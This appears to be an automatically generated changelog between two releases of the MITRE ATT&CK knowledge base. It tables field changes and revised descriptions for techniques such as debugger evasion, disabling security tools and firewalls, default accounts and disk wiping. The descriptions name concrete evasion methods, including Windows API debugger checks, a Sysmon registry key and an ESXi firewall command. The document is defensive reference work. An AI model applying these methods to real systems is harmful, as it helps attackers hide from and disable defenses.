description | Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration. Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system. | Adversaries may search local system sources, such as file systems, configuration files, local databases, or virtual machine files, to find files of interest and sensitive data prior to Exfiltration. Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system. |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.6 | 1.7 |
x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1039] Data from Network Shared Drive
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_system_requirements | ['Privileges to access network shared drive'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-11 21:06:07.690000+00:00 | 2025-04-16 20:37:18.881000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.4 | 1.5 |
[T1025] Data from Removable Media
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_system_requirements | ['Privileges to access removable media drive and files'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:30:50.936000+00:00 | 2025-04-15 19:58:10.837000+00:00 |
x_mitre_version | 1.2 | 1.3 |
[T1102.001] Web Service: Dead Drop Resolver
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-26 23:12:30.499000+00:00 | 2025-04-15 19:59:22.651000+00:00 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1622] Debugger Evasion
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-16 15:05:55.918000+00:00 | 2025-04-15 19:59:16.468000+00:00 |
description | Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.(Citation: ProcessHacker Github) Debugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497), if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads. Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent() and NtQueryInformationProcess(), or manually checking the BeingDebugged flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug) Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW().(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021) | Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.(Citation: ProcessHacker Github) Debugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497), if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads. Specific checks will vary based on the target and/or adversary. On Windows, this may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent() and NtQueryInformationProcess(), or manually checking the BeingDebugged flag of the Process Environment Block (PEB). On Linux, this may involve querying `/proc/self/status` for the `TracerPID` field, which indicates whether or not the process is being traced by dynamic analysis tools.(Citation: Cado Security P2PInfect 2023)(Citation: Positive Technologies Hellhounds 2023) Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug) Malware may also leverage Structured Exception Handling (SEH) to detect debuggers by throwing an exception and detecting whether the process is suspended. SEH handles both hardware and software expectations, providing control over the exceptions including support for debugging. If a debugger is present, the program’s control will be transferred to the debugger, and the execution of the code will be suspended. If the debugger is not present, control will be transferred to the SEH handler, which will automatically handle the exception and allow the program’s execution to continue.(Citation: Apriorit) Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW().(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021) |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Apriorit', 'description': 'Apriorit. (2024, June 4). Anti Debugging Protection Techniques with Examples. Retrieved March 4, 2025.', 'url': 'https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software'} |
external_references | | {'source_name': 'Cado Security P2PInfect 2023', 'description': 'jbowen. (2023, December 4). P2Pinfect - New Variant Targets MIPS Devices. Retrieved March 18, 2025.', 'url': 'https://www.cadosecurity.com/blog/p2pinfect-new-variant-targets-mips-devices'} |
external_references | | {'source_name': 'Positive Technologies Hellhounds 2023', 'description': 'PT Expert Security Center. (2023, November 29). Hellhounds: operation Lahat. Retrieved March 18, 2025.', 'url': 'https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/hellhounds-operation-lahat'} |
x_mitre_contributors | | Joas Antonio dos Santos, @C0d3Cr4zy |
[T1491] Defacement
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-03-25 19:34:42.056000+00:00 | 2025-04-15 19:58:33.958000+00:00 |
x_mitre_version | 1.3 | 1.4 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1078.001] Valid Accounts: Default Accounts
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_contributors | | ['Janantha Marasinghe'] |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 19:58:35.610000+00:00 |
description | Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes) Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module) | Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS, the root user account in ESXi, and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes) Default accounts are not limited to client machines; rather, they also include accounts that are preset for equipment such as network devices and computer applications, whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module) Default accounts may be created on a system after initial setup by connecting or integrating it with another application. For example, when an ESXi server is connected to a vCenter server, a default privileged account called `vpxuser` is created on the ESXi server. If a threat actor is able to compromise this account’s credentials (for example, via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212) on the vCenter host), they will then have access to the ESXi server.(Citation: Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023)(Citation: Pentera vCenter Information Disclosure) |
x_mitre_version | 1.4 | 1.5 |
x_mitre_platforms[6] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023', 'description': 'Alexander Marvi, Brad Slaybaugh, Ron Craft, and Rufus Brown. (2023, June 13). VMware ESXi Zero-Day Used by Chinese Espionage Actor to Perform Privileged Guest Operations on Compromised Hypervisors. Retrieved March 26, 2025.', 'url': 'https://cloud.google.com/blog/topics/threat-intelligence/vmware-esxi-zero-day-bypass/'} |
external_references | | {'source_name': 'Pentera vCenter Information Disclosure', 'description': 'Yuval Lazar. (2022, March 29). Mitigating VMware vCenter Information Disclosure. Retrieved March 26, 2025.', 'url': 'https://pentera.io/blog/information-disclosure-in-vmware-vcenter/'} |
x_mitre_platforms | | ESXi |
[T1140] Deobfuscate/Decode Files or Information
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Anti-virus', 'Host Intrusion Prevention Systems', 'Signature-based Detection', 'Network Intrusion Detection System'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-14 19:28:18.334000+00:00 | 2025-04-15 19:58:24.400000+00:00 |
description | Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system. One such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016) Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) | Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system. One such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b or type command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016)(Citation: Sentinel One Tainted Love 2023) Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.(Citation: Volexity PowerDuke November 2016) |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.3 | 1.4 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Sentinel One Tainted Love 2023', 'description': 'Aleksandar Milenkoski, Juan Andres Guerrero-Saade, and Joey Chen. (2023, March 23). Operation Tainted Love | Chinese APTs Target Telcos in New Attacks. Retrieved March 18, 2025.', 'url': 'https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/'} |
x_mitre_contributors | | Cristóbal Martínez Martín |
x_mitre_platforms | | ESXi |
[T1610] Deploy Container
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_remote_support | True | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 15:06:17.124000+00:00 | 2025-04-15 19:58:33.230000+00:00 |
x_mitre_version | 1.3 | 1.4 |
[T1006] Direct Volume Access
Current version: 2.3
Version changed from: 2.2 → 2.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['File monitoring', 'File system access controls'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-16 12:25:24.480000+00:00 | 2025-04-15 19:58:05.272000+00:00 |
x_mitre_version | 2.2 | 2.3 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Network Devices |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Network | |
[T1600.002] Weaken Encryption: Disable Crypto Hardware
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-10-21 22:37:48.503000+00:00 | 2025-04-15 19:58:45.787000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[T1562.002] Impair Defenses: Disable Windows Event Logging
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Log analysis'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-18 22:33:57.556000+00:00 | 2025-04-16 20:37:17.061000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.3 | 1.4 |
[T1562.004] Impair Defenses: Disable or Modify System Firewall
Current version: 1.3
Version changed from: 1.2 → 1.3
Description diff (old → new): the existing text is unchanged through "...Settings related to enabling abuse of various [Remote Services](https://attack.mitre.org/techniques/T1021) may also indirectly modify firewall rules." The new version appends one paragraph:
Added: In ESXi, firewall rules may be modified directly via the esxcli command line interface (e.g., via `esxcli network firewall set`) or via the vCenter user interface.(Citation: Trellix Rnasomhouse 2024)(Citation: Broadcom ESXi Firewall)
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Firewall'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-12 19:37:57.867000+00:00 | 2025-04-15 19:58:31.395000+00:00 |
description | Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. [Non-Standard Port](https://attack.mitre.org/techniques/T1571)).(Citation: change_rdp_port_conti)
Adversaries may also modify host networking settings that indirectly manipulate system firewalls, such as interface bandwidth or network connection request thresholds.(Citation: Huntress BlackCat) Settings related to enabling abuse of various [Remote Services](https://attack.mitre.org/techniques/T1021) may also indirectly modify firewall rules. | Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. [Non-Standard Port](https://attack.mitre.org/techniques/T1571)).(Citation: change_rdp_port_conti)
Adversaries may also modify host networking settings that indirectly manipulate system firewalls, such as interface bandwidth or network connection request thresholds.(Citation: Huntress BlackCat) Settings related to enabling abuse of various [Remote Services](https://attack.mitre.org/techniques/T1021) may also indirectly modify firewall rules.
In ESXi, firewall rules may be modified directly via the esxcli command line interface (e.g., via `esxcli network firewall set`) or via the vCenter user interface.(Citation: Trellix Rnasomhouse 2024)(Citation: Broadcom ESXi Firewall) |
x_mitre_version | 1.2 | 1.3 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Broadcom ESXi Firewall', 'description': 'Broadcom. (2025, March 24). Add Allowed IP Addresses for an ESXi Host by Using the VMware Host Client. Retrieved March 26, 2025.', 'url': 'https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/7-0/add-allowed-ip-addresses-for-an-esxi-host-by-using-the-vmware-host-client.html'} |
external_references | | {'source_name': 'Trellix Rnasomhouse 2024', 'description': 'Pham Duy Phuc, Max Kersten, Noël Keijzer, and Michaël Schrijver. (2024, February 14). RansomHouse am See. Retrieved March 26, 2025.', 'url': 'https://www.trellix.com/en-au/blogs/research/ransomhouse-am-see/'} |
x_mitre_platforms | | Network Devices |
x_mitre_platforms | | ESXi |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Network | |
[T1562.001] Impair Defenses: Disable or Modify Tools
Current version: 1.6
Version changed from: 1.5 → 1.6
Description diff (old → new): the existing text is unchanged except that the new version inserts the following sentence immediately after "...to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls)", before the paragraph beginning "Adversaries may also focus on specific applications such as Sysmon.":
Added: Alternatively, they may add new directories to an endpoint detection and response (EDR) tool’s exclusion list, enabling them to hide malicious files via [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012).(Citation: BlackBerry WhisperGate 2022)(Citation: Google Cloud Threat Intelligence FIN13 2021)
New Mitigations:
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Anti-virus', 'Log analysis', 'Signature-based detection', 'Host intrusion prevention systems', 'File monitoring'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-12 21:13:46.640000+00:00 | 2025-04-15 19:58:57.147000+00:00 |
description | Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)
Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls)
Adversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Operational may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging)
On network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)(Citation: Analysis of FG-IR-22-369)
In cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.
Furthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)
Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware) | Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)
Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) Alternatively, they may add new directories to an endpoint detection and response (EDR) tool’s exclusion list, enabling them to hide malicious files via [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012).(Citation: BlackBerry WhisperGate 2022)(Citation: Google Cloud Threat Intelligence FIN13 2021)
Adversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Operational may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging)
On network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)(Citation: Analysis of FG-IR-22-369)
In cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.
Furthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)
Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware) |
x_mitre_version | 1.5 | 1.6 |
x_mitre_platforms[5] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'BlackBerry WhisperGate 2022', 'description': 'BlackBerry Research and Intelligence Team. (2022, February 3). Threat Spotlight: WhisperGate Wiper Wreaks Havoc in Ukraine. Retrieved March 18, 2025.', 'url': 'https://blogs.blackberry.com/en/2022/02/threat-spotlight-whispergate-wiper-wreaks-havoc-in-ukraine'} |
external_references | | {'source_name': 'Google Cloud Threat Intelligence FIN13 2021', 'description': 'Van Ta, Jake Nicastro, Rufus Brown, and Nick Richard. (2021, December 7). FIN13: A Cybercriminal Threat Actor Focused on Mexico. Retrieved March 18, 2025.', 'url': 'https://cloud.google.com/blog/topics/threat-intelligence/fin13-cybercriminal-mexico/'} |
x_mitre_contributors | | Menachem Goldstein |
[T1561.001] Disk Wipe: Disk Content Wipe
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-16 13:00:33.303000+00:00 | 2025-04-15 19:59:23.834000+00:00 |
external_references[2]['description'] | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016. | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved November 17, 2024. |
external_references[2]['url'] | https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf | https://web.archive.org/web/20160303200515/https:/operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf |
x_mitre_version | 1.1 | 1.2 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Network Devices |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Network | |
[T1561.002] Disk Wipe: Disk Structure Wipe
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:32:05.064000+00:00 | 2025-04-15 19:58:04.838000+00:00 |
external_references[4]['description'] | FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017. | FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved November 17, 2024. |
external_references[4]['url'] | https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html | https://web.archive.org/web/20210126065851/https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[3] | Network | Network Devices |
[T1561] Disk Wipe
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-20 18:16:41.942000+00:00 | 2025-04-15 19:58:09.974000+00:00 |
external_references[2]['description'] | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016. | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved November 17, 2024. |
external_references[2]['url'] | https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf | https://web.archive.org/web/20160303200515/https:/operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[3] | Network | Network Devices |
[T1078.002] Valid Accounts: Domain Accounts
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User', 'Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-14 14:55:07.432000+00:00 | 2025-04-16 20:37:20.358000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.4 | 1.5 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1090.004] Proxy: Domain Fronting
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-30 21:01:52.356000+00:00 | 2025-04-16 20:37:20.863000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1568.002] Dynamic Resolution: Domain Generation Algorithms
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 15:55:16.111000+00:00 | 2025-04-15 19:58:07.610000+00:00 |
x_mitre_version | 1.1 | 1.2 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1484] Domain or Tenant Policy Modification
Current version: 3.2
Version changed from: 3.1 → 3.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['System access controls', 'File system access controls'] | |
x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 15:55:32.946000+00:00 | 2025-04-15 19:59:19.033000+00:00 |
external_references[10]['description'] | Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved January 6, 2021. | Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved November 17, 2024. |
external_references[10]['url'] | https://www.sygnia.co/golden-saml-advisory | https://www.sygnia.co/threat-reports-and-advisories/golden-saml-attack/ |
x_mitre_version | 3.1 | 3.2 |
[T1562.010] Impair Defenses: Downgrade Attack
Current version: 1.3
Version changed from: 1.2 → 1.3
